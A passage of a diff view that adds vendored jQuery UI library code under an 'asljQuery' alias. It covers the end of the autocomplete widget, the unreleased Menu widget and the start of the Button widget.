+
this.menu = $( "<ul></ul>" )
|
6107 |
+
.addClass( "ui-autocomplete" )
|
6108 |
+
.appendTo( $( this.options.appendTo || "body", doc )[0] )
|
6109 |
+
// prevent the close-on-blur in case of a "slow" click on the menu (long mousedown)
|
6110 |
+
.mousedown(function( event ) {
|
6111 |
+
// clicking on the scrollbar causes focus to shift to the body
|
6112 |
+
// but we can't detect a mouseup or a click immediately afterward
|
6113 |
+
// so we have to track the next mousedown and close the menu if
|
6114 |
+
// the user clicks somewhere outside of the autocomplete
|
6115 |
+
var menuElement = self.menu.element[ 0 ];
|
6116 |
+
if ( !$( event.target ).closest( ".ui-menu-item" ).length ) {
|
6117 |
+
setTimeout(function() {
|
6118 |
+
$( document ).one( 'mousedown', function( event ) {
|
6119 |
+
if ( event.target !== self.element[ 0 ] &&
|
6120 |
+
event.target !== menuElement &&
|
6121 |
+
!$.ui.contains( menuElement, event.target ) ) {
|
6122 |
+
self.close();
|
6123 |
+
}
|
6124 |
+
});
|
6125 |
+
}, 1 );
|
6126 |
+
}
|
6127 |
+
|
6128 |
+
// use another timeout to make sure the blur-event-handler on the input was already triggered
|
6129 |
+
setTimeout(function() {
|
6130 |
+
clearTimeout( self.closing );
|
6131 |
+
}, 13);
|
6132 |
+
})
|
6133 |
+
.menu({
|
6134 |
+
focus: function( event, ui ) {
|
6135 |
+
var item = ui.item.data( "item.autocomplete" );
|
6136 |
+
if ( false !== self._trigger( "focus", event, { item: item } ) ) {
|
6137 |
+
// use value to match what will end up in the input, if it was a key event
|
6138 |
+
if ( /^key/.test(event.originalEvent.type) ) {
|
6139 |
+
self.element.val( item.value );
|
6140 |
+
}
|
6141 |
+
}
|
6142 |
+
},
|
6143 |
+
selected: function( event, ui ) {
|
6144 |
+
var item = ui.item.data( "item.autocomplete" ),
|
6145 |
+
previous = self.previous;
|
6146 |
+
|
6147 |
+
// only trigger when focus was lost (click on menu)
|
6148 |
+
if ( self.element[0] !== doc.activeElement ) {
|
6149 |
+
self.element.focus();
|
6150 |
+
self.previous = previous;
|
6151 |
+
// #6109 - IE triggers two focus events and the second
|
6152 |
+
// is asynchronous, so we need to reset the previous
|
6153 |
+
// term synchronously and asynchronously :-(
|
6154 |
+
setTimeout(function() {
|
6155 |
+
self.previous = previous;
|
6156 |
+
self.selectedItem = item;
|
6157 |
+
}, 1);
|
6158 |
+
}
|
6159 |
+
|
6160 |
+
if ( false !== self._trigger( "select", event, { item: item } ) ) {
|
6161 |
+
self.element.val( item.value );
|
6162 |
+
}
|
6163 |
+
// reset the term after the select event
|
6164 |
+
// this allows custom select handling to work properly
|
6165 |
+
self.term = self.element.val();
|
6166 |
+
|
6167 |
+
self.close( event );
|
6168 |
+
self.selectedItem = item;
|
6169 |
+
},
|
6170 |
+
blur: function( event, ui ) {
|
6171 |
+
// don't set the value of the text field if it's already correct
|
6172 |
+
// this prevents moving the cursor unnecessarily
|
6173 |
+
if ( self.menu.element.is(":visible") &&
|
6174 |
+
( self.element.val() !== self.term ) ) {
|
6175 |
+
self.element.val( self.term );
|
6176 |
+
}
|
6177 |
+
}
|
6178 |
+
})
|
6179 |
+
.zIndex( this.element.zIndex() + 1 )
|
6180 |
+
// workaround for jQuery bug #5781 http://dev.jquery.com/ticket/5781
|
6181 |
+
.css({ top: 0, left: 0 })
|
6182 |
+
.hide()
|
6183 |
+
.data( "menu" );
|
6184 |
+
if ( $.fn.bgiframe ) {
|
6185 |
+
this.menu.element.bgiframe();
|
6186 |
+
}
|
6187 |
+
// turning off autocomplete prevents the browser from remembering the
|
6188 |
+
// value when navigating through history, so we re-enable autocomplete
|
6189 |
+
// if the page is unloaded before the widget is destroyed. #7790
|
6190 |
+
self.beforeunloadHandler = function() {
|
6191 |
+
self.element.removeAttr( "autocomplete" );
|
6192 |
+
};
|
6193 |
+
$( window ).bind( "beforeunload", self.beforeunloadHandler );
|
6194 |
+
},
|
6195 |
+
|
6196 |
+
destroy: function() {
|
6197 |
+
this.element
|
6198 |
+
.removeClass( "ui-autocomplete-input" )
|
6199 |
+
.removeAttr( "autocomplete" )
|
6200 |
+
.removeAttr( "role" )
|
6201 |
+
.removeAttr( "aria-autocomplete" )
|
6202 |
+
.removeAttr( "aria-haspopup" );
|
6203 |
+
this.menu.element.remove();
|
6204 |
+
$( window ).unbind( "beforeunload", this.beforeunloadHandler );
|
6205 |
+
$.Widget.prototype.destroy.call( this );
|
6206 |
+
},
|
6207 |
+
|
6208 |
+
_setOption: function( key, value ) {
|
6209 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
6210 |
+
if ( key === "source" ) {
|
6211 |
+
this._initSource();
|
6212 |
+
}
|
6213 |
+
if ( key === "appendTo" ) {
|
6214 |
+
this.menu.element.appendTo( $( value || "body", this.element[0].ownerDocument )[0] )
|
6215 |
+
}
|
6216 |
+
if ( key === "disabled" && value && this.xhr ) {
|
6217 |
+
this.xhr.abort();
|
6218 |
+
}
|
6219 |
+
},
|
6220 |
+
|
6221 |
+
_initSource: function() {
|
6222 |
+
var self = this,
|
6223 |
+
array,
|
6224 |
+
url;
|
6225 |
+
if ( $.isArray(this.options.source) ) {
|
6226 |
+
array = this.options.source;
|
6227 |
+
this.source = function( request, response ) {
|
6228 |
+
response( $.ui.autocomplete.filter(array, request.term) );
|
6229 |
+
};
|
6230 |
+
} else if ( typeof this.options.source === "string" ) {
|
6231 |
+
url = this.options.source;
|
6232 |
+
this.source = function( request, response ) {
|
6233 |
+
if ( self.xhr ) {
|
6234 |
+
self.xhr.abort();
|
6235 |
+
}
|
6236 |
+
self.xhr = $.ajax({
|
6237 |
+
url: url,
|
6238 |
+
data: request,
|
6239 |
+
dataType: "json",
|
6240 |
+
success: function( data, status ) {
|
6241 |
+
response( data );
|
6242 |
+
},
|
6243 |
+
error: function() {
|
6244 |
+
response( [] );
|
6245 |
+
}
|
6246 |
+
});
|
6247 |
+
};
|
6248 |
+
} else {
|
6249 |
+
this.source = this.options.source;
|
6250 |
+
}
|
6251 |
+
},
|
6252 |
+
|
6253 |
+
search: function( value, event ) {
|
6254 |
+
value = value != null ? value : this.element.val();
|
6255 |
+
|
6256 |
+
// always save the actual value, not the one passed as an argument
|
6257 |
+
this.term = this.element.val();
|
6258 |
+
|
6259 |
+
if ( value.length < this.options.minLength ) {
|
6260 |
+
return this.close( event );
|
6261 |
+
}
|
6262 |
+
|
6263 |
+
clearTimeout( this.closing );
|
6264 |
+
if ( this._trigger( "search", event ) === false ) {
|
6265 |
+
return;
|
6266 |
+
}
|
6267 |
+
|
6268 |
+
return this._search( value );
|
6269 |
+
},
|
6270 |
+
|
6271 |
+
_search: function( value ) {
|
6272 |
+
this.pending++;
|
6273 |
+
this.element.addClass( "ui-autocomplete-loading" );
|
6274 |
+
|
6275 |
+
this.source( { term: value }, this._response() );
|
6276 |
+
},
|
6277 |
+
|
6278 |
+
_response: function() {
|
6279 |
+
var that = this,
|
6280 |
+
index = ++requestIndex;
|
6281 |
+
|
6282 |
+
return function( content ) {
|
6283 |
+
if ( index === requestIndex ) {
|
6284 |
+
that.__response( content );
|
6285 |
+
}
|
6286 |
+
|
6287 |
+
that.pending--;
|
6288 |
+
if ( !that.pending ) {
|
6289 |
+
that.element.removeClass( "ui-autocomplete-loading" );
|
6290 |
+
}
|
6291 |
+
};
|
6292 |
+
},
|
6293 |
+
|
6294 |
+
__response: function( content ) {
|
6295 |
+
if ( !this.options.disabled && content && content.length ) {
|
6296 |
+
content = this._normalize( content );
|
6297 |
+
this._suggest( content );
|
6298 |
+
this._trigger( "open" );
|
6299 |
+
} else {
|
6300 |
+
this.close();
|
6301 |
+
}
|
6302 |
+
},
|
6303 |
+
|
6304 |
+
close: function( event ) {
|
6305 |
+
clearTimeout( this.closing );
|
6306 |
+
if ( this.menu.element.is(":visible") ) {
|
6307 |
+
this.menu.element.hide();
|
6308 |
+
this.menu.deactivate();
|
6309 |
+
this._trigger( "close", event );
|
6310 |
+
}
|
6311 |
+
},
|
6312 |
+
|
6313 |
+
_change: function( event ) {
|
6314 |
+
if ( this.previous !== this.element.val() ) {
|
6315 |
+
this._trigger( "change", event, { item: this.selectedItem } );
|
6316 |
+
}
|
6317 |
+
},
|
6318 |
+
|
6319 |
+
_normalize: function( items ) {
|
6320 |
+
// assume all items have the right format when the first item is complete
|
6321 |
+
if ( items.length && items[0].label && items[0].value ) {
|
6322 |
+
return items;
|
6323 |
+
}
|
6324 |
+
return $.map( items, function(item) {
|
6325 |
+
if ( typeof item === "string" ) {
|
6326 |
+
return {
|
6327 |
+
label: item,
|
6328 |
+
value: item
|
6329 |
+
};
|
6330 |
+
}
|
6331 |
+
return $.extend({
|
6332 |
+
label: item.label || item.value,
|
6333 |
+
value: item.value || item.label
|
6334 |
+
}, item );
|
6335 |
+
});
|
6336 |
+
},
|
6337 |
+
|
6338 |
+
_suggest: function( items ) {
|
6339 |
+
var ul = this.menu.element
|
6340 |
+
.empty()
|
6341 |
+
.zIndex( this.element.zIndex() + 1 );
|
6342 |
+
this._renderMenu( ul, items );
|
6343 |
+
// TODO refresh should check if the active item is still in the dom, removing the need for a manual deactivate
|
6344 |
+
this.menu.deactivate();
|
6345 |
+
this.menu.refresh();
|
6346 |
+
|
6347 |
+
// size and position menu
|
6348 |
+
ul.show();
|
6349 |
+
this._resizeMenu();
|
6350 |
+
ul.position( $.extend({
|
6351 |
+
of: this.element
|
6352 |
+
}, this.options.position ));
|
6353 |
+
|
6354 |
+
if ( this.options.autoFocus ) {
|
6355 |
+
this.menu.next( new $.Event("mouseover") );
|
6356 |
+
}
|
6357 |
+
},
|
6358 |
+
|
6359 |
+
_resizeMenu: function() {
|
6360 |
+
var ul = this.menu.element;
|
6361 |
+
ul.outerWidth( Math.max(
|
6362 |
+
// Firefox wraps long text (possibly a rounding bug)
|
6363 |
+
// so we add 1px to avoid the wrapping (#7513)
|
6364 |
+
ul.width( "" ).outerWidth() + 1,
|
6365 |
+
this.element.outerWidth()
|
6366 |
+
) );
|
6367 |
+
},
|
6368 |
+
|
6369 |
+
_renderMenu: function( ul, items ) {
|
6370 |
+
var self = this;
|
6371 |
+
$.each( items, function( index, item ) {
|
6372 |
+
self._renderItem( ul, item );
|
6373 |
+
});
|
6374 |
+
},
|
6375 |
+
|
6376 |
+
_renderItem: function( ul, item) {
|
6377 |
+
return $( "<li></li>" )
|
6378 |
+
.data( "item.autocomplete", item )
|
6379 |
+
.append( $( "<a></a>" ).text( item.label ) )
|
6380 |
+
.appendTo( ul );
|
6381 |
+
},
|
6382 |
+
|
6383 |
+
_move: function( direction, event ) {
|
6384 |
+
if ( !this.menu.element.is(":visible") ) {
|
6385 |
+
this.search( null, event );
|
6386 |
+
return;
|
6387 |
+
}
|
6388 |
+
if ( this.menu.first() && /^previous/.test(direction) ||
|
6389 |
+
this.menu.last() && /^next/.test(direction) ) {
|
6390 |
+
this.element.val( this.term );
|
6391 |
+
this.menu.deactivate();
|
6392 |
+
return;
|
6393 |
+
}
|
6394 |
+
this.menu[ direction ]( event );
|
6395 |
+
},
|
6396 |
+
|
6397 |
+
widget: function() {
|
6398 |
+
return this.menu.element;
|
6399 |
+
},
|
6400 |
+
_keyEvent: function( keyEvent, event ) {
|
6401 |
+
if ( !this.isMultiLine || this.menu.element.is( ":visible" ) ) {
|
6402 |
+
this._move( keyEvent, event );
|
6403 |
+
|
6404 |
+
// prevents moving cursor to beginning/end of the text field in some browsers
|
6405 |
+
event.preventDefault();
|
6406 |
+
}
|
6407 |
+
}
|
6408 |
+
});
|
6409 |
+
|
6410 |
+
$.extend( $.ui.autocomplete, {
|
6411 |
+
escapeRegex: function( value ) {
|
6412 |
+
return value.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
|
6413 |
+
},
|
6414 |
+
filter: function(array, term) {
|
6415 |
+
var matcher = new RegExp( $.ui.autocomplete.escapeRegex(term), "i" );
|
6416 |
+
return $.grep( array, function(value) {
|
6417 |
+
return matcher.test( value.label || value.value || value );
|
6418 |
+
});
|
6419 |
+
}
|
6420 |
+
});
|
6421 |
+
|
6422 |
+
}(asljQuery));
|
6423 |
+
|
6424 |
+
/*
|
6425 |
+
* jQuery UI Menu (not officially released)
|
6426 |
+
*
|
6427 |
+
* This widget isn't yet finished and the API is subject to change. We plan to finish
|
6428 |
+
* it for the next release. You're welcome to give it a try anyway and give us feedback,
|
6429 |
+
* as long as you're okay with migrating your code later on. We can help with that, too.
|
6430 |
+
*
|
6431 |
+
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
|
6432 |
+
* Dual licensed under the MIT or GPL Version 2 licenses.
|
6433 |
+
* http://jquery.org/license
|
6434 |
+
*
|
6435 |
+
* http://docs.jquery.com/UI/Menu
|
6436 |
+
*
|
6437 |
+
* Depends:
|
6438 |
+
* jquery.ui.core.js
|
6439 |
+
* jquery.ui.widget.js
|
6440 |
+
*/
|
6441 |
+
(function($) {
|
6442 |
+
|
6443 |
+
$.widget("ui.menu", {
|
6444 |
+
_create: function() {
|
6445 |
+
var self = this;
|
6446 |
+
this.element
|
6447 |
+
.addClass("ui-menu ui-widget ui-widget-content ui-corner-all")
|
6448 |
+
.attr({
|
6449 |
+
role: "listbox",
|
6450 |
+
"aria-activedescendant": "ui-active-menuitem"
|
6451 |
+
})
|
6452 |
+
.click(function( event ) {
|
6453 |
+
if ( !$( event.target ).closest( ".ui-menu-item a" ).length ) {
|
6454 |
+
return;
|
6455 |
+
}
|
6456 |
+
// temporary
|
6457 |
+
event.preventDefault();
|
6458 |
+
self.select( event );
|
6459 |
+
});
|
6460 |
+
this.refresh();
|
6461 |
+
},
|
6462 |
+
|
6463 |
+
refresh: function() {
|
6464 |
+
var self = this;
|
6465 |
+
|
6466 |
+
// don't refresh list items that are already adapted
|
6467 |
+
var items = this.element.children("li:not(.ui-menu-item):has(a)")
|
6468 |
+
.addClass("ui-menu-item")
|
6469 |
+
.attr("role", "menuitem");
|
6470 |
+
|
6471 |
+
items.children("a")
|
6472 |
+
.addClass("ui-corner-all")
|
6473 |
+
.attr("tabindex", -1)
|
6474 |
+
// mouseenter doesn't work with event delegation
|
6475 |
+
.mouseenter(function( event ) {
|
6476 |
+
self.activate( event, $(this).parent() );
|
6477 |
+
})
|
6478 |
+
.mouseleave(function() {
|
6479 |
+
self.deactivate();
|
6480 |
+
});
|
6481 |
+
},
|
6482 |
+
|
6483 |
+
activate: function( event, item ) {
|
6484 |
+
this.deactivate();
|
6485 |
+
if (this.hasScroll()) {
|
6486 |
+
var offset = item.offset().top - this.element.offset().top,
|
6487 |
+
scroll = this.element.scrollTop(),
|
6488 |
+
elementHeight = this.element.height();
|
6489 |
+
if (offset < 0) {
|
6490 |
+
this.element.scrollTop( scroll + offset);
|
6491 |
+
} else if (offset >= elementHeight) {
|
6492 |
+
this.element.scrollTop( scroll + offset - elementHeight + item.height());
|
6493 |
+
}
|
6494 |
+
}
|
6495 |
+
this.active = item.eq(0)
|
6496 |
+
.children("a")
|
6497 |
+
.addClass("ui-state-hover")
|
6498 |
+
.attr("id", "ui-active-menuitem")
|
6499 |
+
.end();
|
6500 |
+
this._trigger("focus", event, { item: item });
|
6501 |
+
},
|
6502 |
+
|
6503 |
+
deactivate: function() {
|
6504 |
+
if (!this.active) { return; }
|
6505 |
+
|
6506 |
+
this.active.children("a")
|
6507 |
+
.removeClass("ui-state-hover")
|
6508 |
+
.removeAttr("id");
|
6509 |
+
this._trigger("blur");
|
6510 |
+
this.active = null;
|
6511 |
+
},
|
6512 |
+
|
6513 |
+
next: function(event) {
|
6514 |
+
this.move("next", ".ui-menu-item:first", event);
|
6515 |
+
},
|
6516 |
+
|
6517 |
+
previous: function(event) {
|
6518 |
+
this.move("prev", ".ui-menu-item:last", event);
|
6519 |
+
},
|
6520 |
+
|
6521 |
+
first: function() {
|
6522 |
+
return this.active && !this.active.prevAll(".ui-menu-item").length;
|
6523 |
+
},
|
6524 |
+
|
6525 |
+
last: function() {
|
6526 |
+
return this.active && !this.active.nextAll(".ui-menu-item").length;
|
6527 |
+
},
|
6528 |
+
|
6529 |
+
move: function(direction, edge, event) {
|
6530 |
+
if (!this.active) {
|
6531 |
+
this.activate(event, this.element.children(edge));
|
6532 |
+
return;
|
6533 |
+
}
|
6534 |
+
var next = this.active[direction + "All"](".ui-menu-item").eq(0);
|
6535 |
+
if (next.length) {
|
6536 |
+
this.activate(event, next);
|
6537 |
+
} else {
|
6538 |
+
this.activate(event, this.element.children(edge));
|
6539 |
+
}
|
6540 |
+
},
|
6541 |
+
|
6542 |
+
// TODO merge with previousPage
|
6543 |
+
nextPage: function(event) {
|
6544 |
+
if (this.hasScroll()) {
|
6545 |
+
// TODO merge with no-scroll-else
|
6546 |
+
if (!this.active || this.last()) {
|
6547 |
+
this.activate(event, this.element.children(".ui-menu-item:first"));
|
6548 |
+
return;
|
6549 |
+
}
|
6550 |
+
var base = this.active.offset().top,
|
6551 |
+
height = this.element.height(),
|
6552 |
+
result = this.element.children(".ui-menu-item").filter(function() {
|
6553 |
+
var close = $(this).offset().top - base - height + $(this).height();
|
6554 |
+
// TODO improve approximation
|
6555 |
+
return close < 10 && close > -10;
|
6556 |
+
});
|
6557 |
+
|
6558 |
+
// TODO try to catch this earlier when scrollTop indicates the last page anyway
|
6559 |
+
if (!result.length) {
|
6560 |
+
result = this.element.children(".ui-menu-item:last");
|
6561 |
+
}
|
6562 |
+
this.activate(event, result);
|
6563 |
+
} else {
|
6564 |
+
this.activate(event, this.element.children(".ui-menu-item")
|
6565 |
+
.filter(!this.active || this.last() ? ":first" : ":last"));
|
6566 |
+
}
|
6567 |
+
},
|
6568 |
+
|
6569 |
+
// TODO merge with nextPage
|
6570 |
+
previousPage: function(event) {
|
6571 |
+
if (this.hasScroll()) {
|
6572 |
+
// TODO merge with no-scroll-else
|
6573 |
+
if (!this.active || this.first()) {
|
6574 |
+
this.activate(event, this.element.children(".ui-menu-item:last"));
|
6575 |
+
return;
|
6576 |
+
}
|
6577 |
+
|
6578 |
+
var base = this.active.offset().top,
|
6579 |
+
height = this.element.height(),
|
6580 |
+
result = this.element.children(".ui-menu-item").filter(function() {
|
6581 |
+
var close = $(this).offset().top - base + height - $(this).height();
|
6582 |
+
// TODO improve approximation
|
6583 |
+
return close < 10 && close > -10;
|
6584 |
+
});
|
6585 |
+
|
6586 |
+
// TODO try to catch this earlier when scrollTop indicates the last page anyway
|
6587 |
+
if (!result.length) {
|
6588 |
+
result = this.element.children(".ui-menu-item:first");
|
6589 |
+
}
|
6590 |
+
this.activate(event, result);
|
6591 |
+
} else {
|
6592 |
+
this.activate(event, this.element.children(".ui-menu-item")
|
6593 |
+
.filter(!this.active || this.first() ? ":last" : ":first"));
|
6594 |
+
}
|
6595 |
+
},
|
6596 |
+
|
6597 |
+
hasScroll: function() {
|
6598 |
+
return this.element.height() < this.element[ $.fn.prop ? "prop" : "attr" ]("scrollHeight");
|
6599 |
+
},
|
6600 |
+
|
6601 |
+
select: function( event ) {
|
6602 |
+
this._trigger("selected", event, { item: this.active });
|
6603 |
+
}
|
6604 |
+
});
|
6605 |
+
|
6606 |
+
}(asljQuery));
|
6607 |
+
|
6608 |
+
(function( $, undefined ) {
|
6609 |
+
|
6610 |
+
var lastActive, startXPos, startYPos, clickDragged,
|
6611 |
+
baseClasses = "ui-button ui-widget ui-state-default ui-corner-all",
|
6612 |
+
stateClasses = "ui-state-hover ui-state-active ",
|
6613 |
+
typeClasses = "ui-button-icons-only ui-button-icon-only ui-button-text-icons ui-button-text-icon-primary ui-button-text-icon-secondary ui-button-text-only",
|
6614 |
+
formResetHandler = function() {
|
6615 |
+
var buttons = $( this ).find( ":ui-button" );
|
6616 |
+
setTimeout(function() {
|
6617 |
+
buttons.button( "refresh" );
|
6618 |
+
}, 1 );
|
6619 |
+
},
|
6620 |
+
radioGroup = function( radio ) {
|
6621 |
+
var name = radio.name,
|
6622 |
+
form = radio.form,
|
6623 |
+
radios = $( [] );
|
6624 |
+
if ( name ) {
|
6625 |
+
if ( form ) {
|
6626 |
+
radios = $( form ).find( "[name='" + name + "']" );
|
6627 |
+
} else {
|
6628 |
+
radios = $( "[name='" + name + "']", radio.ownerDocument )
|
6629 |
+
.filter(function() {
|
6630 |
+
return !this.form;
|
6631 |
+
});
|
6632 |
+
}
|
6633 |
+
}
|
6634 |
+
return radios;
|
6635 |
+
};
|
6636 |
+
|
6637 |
+
$.widget( "ui.button", {
|
6638 |
+
options: {
|
6639 |
+
disabled: null,
|
6640 |
+
text: true,
|
6641 |
+
label: null,
|
6642 |
+
icons: {
|
6643 |
+
primary: null,
|
6644 |
+
secondary: null
|
6645 |
+
}
|
6646 |
+
},
|
6647 |
+
_create: function() {
|
6648 |
+
this.element.closest( "form" )
|
6649 |
+
.unbind( "reset.button" )
|
6650 |
+
.bind( "reset.button", formResetHandler );
|
6651 |
+
|
6652 |
+
if ( typeof this.options.disabled !== "boolean" ) {
|
6653 |
+
this.options.disabled = !!this.element.propAttr( "disabled" );
|
6654 |
+
} else {
|
6655 |
+
this.element.propAttr( "disabled", this.options.disabled );
|
6656 |
+
}
|
6657 |
+
|
6658 |
+
this._determineButtonType();
|
6659 |
+
this.hasTitle = !!this.buttonElement.attr( "title" );
|
6660 |
+
|
6661 |
+
var self = this,
|
6662 |
+
options = this.options,
|
6663 |
+
toggleButton = this.type === "checkbox" || this.type === "radio",
|
6664 |
+
hoverClass = "ui-state-hover" + ( !toggleButton ? " ui-state-active" : "" ),
|
6665 |
+
focusClass = "ui-state-focus";
|
6666 |
+
|
6667 |
+
if ( options.label === null ) {
|
6668 |
+
options.label = this.buttonElement.html();
|
6669 |
+
}
|
6670 |
+
|
6671 |
+
this.buttonElement
|
6672 |
+
.addClass( baseClasses )
|
6673 |
+
.attr( "role", "button" )
|
6674 |
+
.bind( "mouseenter.button", function() {
|
6675 |
+
if ( options.disabled ) {
|
6676 |
+
return;
|
6677 |
+
}
|
6678 |
+
$( this ).addClass( "ui-state-hover" );
|
6679 |
+
if ( this === lastActive ) {
|
6680 |
+
$( this ).addClass( "ui-state-active" );
|
6681 |
+
}
|
6682 |
+
})
|
6683 |
+
.bind( "mouseleave.button", function() {
|
6684 |
+
if ( options.disabled ) {
|
6685 |
+
return;
|
6686 |
+
}
|
6687 |
+
$( this ).removeClass( hoverClass );
|
6688 |
+
})
|
6689 |
+
.bind( "click.button", function( event ) {
|
6690 |
+
if ( options.disabled ) {
|
6691 |
+
event.preventDefault();
|
6692 |
+
event.stopImmediatePropagation();
|
6693 |
+
}
|
6694 |
+
});
|
6695 |
+
|
6696 |
+
this.element
|
6697 |
+
.bind( "focus.button", function() {
|
6698 |
+
// no need to check disabled, focus won't be triggered anyway
|
6699 |
+
self.buttonElement.addClass( focusClass );
|
6700 |
+
})
|
6701 |
+
.bind( "blur.button", function() {
|
6702 |
+
self.buttonElement.removeClass( focusClass );
|
6703 |
+
});
|
6704 |
+
|
6705 |
+
if ( toggleButton ) {
|
6706 |
+
this.element.bind( "change.button", function() {
|
6707 |
+
if ( clickDragged ) {
|
6708 |
+
return;
|
6709 |
+
}
|
6710 |
+
self.refresh();
|
6711 |
+
});
|
6712 |
+
// if mouse moves between mousedown and mouseup (drag) set clickDragged flag
|
6713 |
+
// prevents issue where button state changes but checkbox/radio checked state
|
6714 |
+
// does not in Firefox (see ticket #6970)
|
6715 |
+
this.buttonElement
|
6716 |
+
.bind( "mousedown.button", function( event ) {
|
6717 |
+
if ( options.disabled ) {
|
6718 |
+
return;
|
6719 |
+
}
|
6720 |
+
clickDragged = false;
|
6721 |
+
startXPos = event.pageX;
|
6722 |
+
startYPos = event.pageY;
|
6723 |
+
})
|
6724 |
+
.bind( "mouseup.button", function( event ) {
|
6725 |
+
if ( options.disabled ) {
|
6726 |
+
return;
|
6727 |
+
}
|
6728 |
+
if ( startXPos !== event.pageX || startYPos !== event.pageY ) {
|
6729 |
+
clickDragged = true;
|
6730 |
+
}
|
6731 |
+
});
|
6732 |
+
}
|
6733 |
+
|
6734 |
+
if ( this.type === "checkbox" ) {
|
6735 |
+
this.buttonElement.bind( "click.button", function() {
|
6736 |
+
if ( options.disabled || clickDragged ) {
|
6737 |
+
return false;
|
6738 |
+
}
|
6739 |
+
$( this ).toggleClass( "ui-state-active" );
|
6740 |
+
self.buttonElement.attr( "aria-pressed", self.element[0].checked );
|
6741 |
+
});
|
6742 |
+
} else if ( this.type === "radio" ) {
|
6743 |
+
this.buttonElement.bind( "click.button", function() {
|
6744 |
+
if ( options.disabled || clickDragged ) {
|
6745 |
+
return false;
|
6746 |
+
}
|
6747 |
+
$( this ).addClass( "ui-state-active" );
|
6748 |
+
self.buttonElement.attr( "aria-pressed", "true" );
|
6749 |
+
|
6750 |
+
var radio = self.element[ 0 ];
|
6751 |
+
radioGroup( radio )
|
6752 |
+
.not( radio )
|
6753 |
+
.map(function() {
|
6754 |
+
return $( this ).button( "widget" )[ 0 ];
|
6755 |
+
})
|
6756 |
+
.removeClass( "ui-state-active" )
|
6757 |
+
.attr( "aria-pressed", "false" );
|
6758 |
+
});
|
6759 |
+
} else {
|
6760 |
+
this.buttonElement
|
6761 |
+
.bind( "mousedown.button", function() {
|
6762 |
+
if ( options.disabled ) {
|
6763 |
+
return false;
|
6764 |
+
}
|
6765 |
+
$( this ).addClass( "ui-state-active" );
|
6766 |
+
lastActive = this;
|
6767 |
+
$( document ).one( "mouseup", function() {
|
6768 |
+
lastActive = null;
|
6769 |
+
});
|
6770 |
+
})
|
6771 |
+
.bind( "mouseup.button", function() {
|
6772 |
+
if ( options.disabled ) {
|
6773 |
+
return false;
|
6774 |
+
}
|
6775 |
+
$( this ).removeClass( "ui-state-active" );
|
6776 |
+
})
|
6777 |
+
.bind( "keydown.button", function(event) {
|
6778 |
+
if ( options.disabled ) {
|
6779 |
+
return false;
|
6780 |
+
}
|
6781 |
+
if ( event.keyCode == $.ui.keyCode.SPACE || event.keyCode == $.ui.keyCode.ENTER ) {
|
6782 |
+
$( this ).addClass( "ui-state-active" );
|
6783 |
+
}
|
6784 |
+
})
|
6785 |
+
.bind( "keyup.button", function() {
|
6786 |
+
$( this ).removeClass( "ui-state-active" );
|
6787 |
+
});
|
6788 |
+
|
6789 |
+
if ( this.buttonElement.is("a") ) {
|
6790 |
+
this.buttonElement.keyup(function(event) {
|
6791 |
+
if ( event.keyCode === $.ui.keyCode.SPACE ) {
|
6792 |
+
// TODO pass through original event correctly (just as 2nd argument doesn't work)
|
6793 |
+
$( this ).click();
|
6794 |
+
}
|
6795 |
+
});
|
6796 |
+
}
|
6797 |
+
}
|
6798 |
+
|
6799 |
+
// TODO: pull out $.Widget's handling for the disabled option into
|
6800 |
+
// $.Widget.prototype._setOptionDisabled so it's easy to proxy and can
|
6801 |
+
// be overridden by individual plugins
|
6802 |
+
this._setOption( "disabled", options.disabled );
|
6803 |
+
this._resetButton();
|
6804 |
+
},
|
6805 |
+
|
6806 |
+
_determineButtonType: function() {
|
6807 |
+
|
6808 |
+
if ( this.element.is(":checkbox") ) {
|
6809 |
+
this.type = "checkbox";
|
6810 |
+
} else if ( this.element.is(":radio") ) {
|
6811 |
+
this.type = "radio";
|
6812 |
+
} else if ( this.element.is("input") ) {
|
6813 |
+
this.type = "input";
|
6814 |
+
} else {
|
6815 |
+
this.type = "button";
|
6816 |
+
}
|
6817 |
+
|
6818 |
+
if ( this.type === "checkbox" || this.type === "radio" ) {
|
6819 |
+
// we don't search against the document in case the element
|
6820 |
+
// is disconnected from the DOM
|
6821 |
+
var ancestor = this.element.parents().filter(":last"),
|
6822 |
+
labelSelector = "label[for='" + this.element.attr("id") + "']";
|
6823 |
+
this.buttonElement = ancestor.find( labelSelector );
|
6824 |
+
if ( !this.buttonElement.length ) {
|
6825 |
+
ancestor = ancestor.length ? ancestor.siblings() : this.element.siblings();
|
6826 |
+
this.buttonElement = ancestor.filter( labelSelector );
|
6827 |
+
if ( !this.buttonElement.length ) {
|
6828 |
+
this.buttonElement = ancestor.find( labelSelector );
|
6829 |
+
}
|
6830 |
+
}
|
6831 |
+
this.element.addClass( "ui-helper-hidden-accessible" );
|
6832 |
+
|
6833 |
+
var checked = this.element.is( ":checked" );
|
6834 |
+
if ( checked ) {
|
6835 |
+
this.buttonElement.addClass( "ui-state-active" );
|
6836 |
+
}
|
6837 |
+
this.buttonElement.attr( "aria-pressed", checked );
|
6838 |
+
} else {
|
6839 |
+
this.buttonElement = this.element;
|
6840 |
+
}
|
6841 |
+
},
|
6842 |
+
|
6843 |
+
widget: function() {
|
6844 |
+
return this.buttonElement;
|
6845 |
+
},
|
6846 |
+
|
6847 |
+
destroy: function() {
|
6848 |
+
this.element
|
6849 |
+
.removeClass( "ui-helper-hidden-accessible" );
|
6850 |
+
this.buttonElement
|
6851 |
+
.removeClass( baseClasses + " " + stateClasses + " " + typeClasses )
|
6852 |
+
.removeAttr( "role" )
|
6853 |
+
.removeAttr( "aria-pressed" )
|
6854 |
+
.html( this.buttonElement.find(".ui-button-text").html() );
|
6855 |
+
|
6856 |
+
if ( !this.hasTitle ) {
|
6857 |
+
this.buttonElement.removeAttr( "title" );
|
6858 |
+
}
|
6859 |
+
|
6860 |
+
$.Widget.prototype.destroy.call( this );
|
6861 |
+
},
|
6862 |
+
|
6863 |
+
_setOption: function( key, value ) {
|
6864 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
6865 |
+
if ( key === "disabled" ) {
|
6866 |
+
if ( value ) {
|
6867 |
+
this.element.propAttr( "disabled", true );
|
6868 |
+
} else {
|
6869 |
+
this.element.propAttr( "disabled", false );
|
6870 |
+
}
|
6871 |
+
return;
|
6872 |
+
}
|
6873 |
+
this._resetButton();
|
6874 |
+
},
|
6875 |
+
|
6876 |
+
refresh: function() {
